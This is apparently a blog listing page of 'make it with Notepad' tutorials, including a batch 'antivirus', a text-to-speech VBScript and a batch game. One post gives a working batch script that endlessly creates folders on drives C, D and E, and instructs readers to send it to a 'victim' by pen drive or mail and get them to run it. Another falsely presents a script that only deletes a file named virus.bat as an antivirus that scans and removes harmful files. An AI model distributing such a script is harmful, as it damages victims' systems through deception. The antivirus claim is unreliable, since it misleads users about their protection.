Skip to main content

Posts

How To Create a Antivirus with notepad?

The main functioning of Antivirus is to detect and remove harmful or unwanted files which may slowdown your computer and windows. But if you don’t have enough time to download any best antivirus. Then simply use this trick to make your own antivirus. This antivirus scan by using command prompt and delete unwanted files automatically. Open your Notepad and paste this given code  @echo off title Antivirus echo Antivirus echo created by your name :start IF EXIST virus.bat goto infected IF NOT EXIST virus.bat goto clean cd C:\Windows\system32 :infected echo WARNING VIRUS DETECTED! del virus.bat pause goto start :clean echo System secure! pause exit Now save your file with softwareforfre.bat and select “All files”

Make A Simple Virus in Notepad

Here we are going to show, How to make Simple Virus in notepad.  We will Create a Virus  We will Check it on Victims Computer.    [ Note : Don't try it on your computer ]   Open Notepad and Copy the Following code in Notepad. Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ] Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat] @echo off :VIRUS cd /d C: md %RANDOM% cd /d D: md %RANDOM% cd /d E: md %RANDOM% goto VIRUS REM ####################### REM softwareforfre.blogspot.com Give it to Victim   Now Give this file to Victim via Pen-drive or Mail then ask to Open it. It will Create More Folder in C,D,and E drive.

What Is Virus?

Virus               A software program first written Rich Skrenta in 1982 who was a 15-year old high school student. Known as The Elk Cloner this virus spread to other computers by monitoring the floppy drive and copying itself to any floppy diskette that was inserted into the computer. Once a floppy diskette became infected it would infect all other computers that disk was inserted into, each computer that was infected would then infect every floppy diskette inserted into it. A computer that was infected would also display a short poem on every 50th boot. The concept of a computer program capable of reproducing itself was first mentioned by John von Neumann in his 1949 "Theory of self-reproducing automata" essay. Later, Fred Cohen in 1983 later coined the term virus in a 1984 research paper as "a computer program that can affect other computer programs by modifying them in such a way as to include a (possibl...

Create a Simple Webpage Using Notepad

Webpages. We use them every day. But how hard is it to make a webpage? You can make a simple webpage easily with Notepad   Open Notepad. Click File->Save As. Choose all files from the file type menu. Save your file as file.html You can replace file with anything. Usually the main page of a website is index.html Now you can start coding. Don't worry, it's not hard!   HTML (hypertext markup language) uses tags. Tags are basically some text inside of You will use a variety of tags to create your webpage. There are also "end tags" which look like These end things like a bold font.   The first tag of a webpage is usually the html. You can put this at the top of your Notepad file.     The next tag is the tag. Between the and tags are the title tag, which tells the browser what to put at the top of the window, and meta tags, which tell search engines like Google what the site is about. On the next line after your tag, put a Now...

Make Software With Notepad

Do You Want To Make Software ?? But For This You have to Know Computer Programming Language  In this post i will guide you How to make a software without any programming skills , just from Notepad . Ever Wanted To Make A software through Notepad Then Follow This Steps- 1. Open Notepad . 2. Copy and paste the below mentioned code : Dim msg, sapi msg=InputBox("Enter your text for conversion–www.sonuandtechnology.blogspot.com","Sonuandtechnology Text-To-Audio Converter") Set sapi=CreateObject("sapi.spvoice") sapi.Speak msg 3. Save this file with any name with .vbs as extension. For eg. Text-To-Audio.vbs It will look like this  Then Open It by double clicking it What To Do With The Software?? You Can Convert Text To Audio With This Software Whatever you write in the text box , system will change that into a audio So enjoy the post and subscribe to be updated.....

Create A Talking Application Using Notepad

There are many times when you wanted something interactive from your computer. For fun you can build this application, which is too easy. This can also save your money as there are some app which asks for money. So this will be awesome for you! I am going to guide you about how to make an Notepad application that speaks. This application basically works on "visual basic coding" Before starting up I will teach you some important things, the things you need to learn is what each statement does. The Image above is the actual notepad coding that you are going to learn. Before making any application it is necessary to learn the small things. You must know that what does each line exactly do. As it will going to help you if you wanted to edit you app yourself. So In the next paragraph I will explain you each line! Below is the image marked with numbers. In same numerical order I will be guiding you! T...

Creating A Game With Notepad

You probably won't know what all of this means right now, but I'll explain it soon. Introduction Did you know that the simple Notepad program on your computer is actually a very powerful programming tool? That's right, and it is also very easy to learn. In this article I'm going to show you how to make a simple game using only the Notepad program and a programming language called "Batch." Batch is a language that runs primarily out of your Windows command prompt. Now, it's not even close to being the most powerful programming language out there, but it still let's you do enough to be extremely useful to know (at least for anyone in the computer field). Not only is it useful, but it can also be used to create amazing text-based games ! What is a text-based game you ask? It's a game (a very simple one) in which the user interacts through the use of text and choice-making.You will learn h...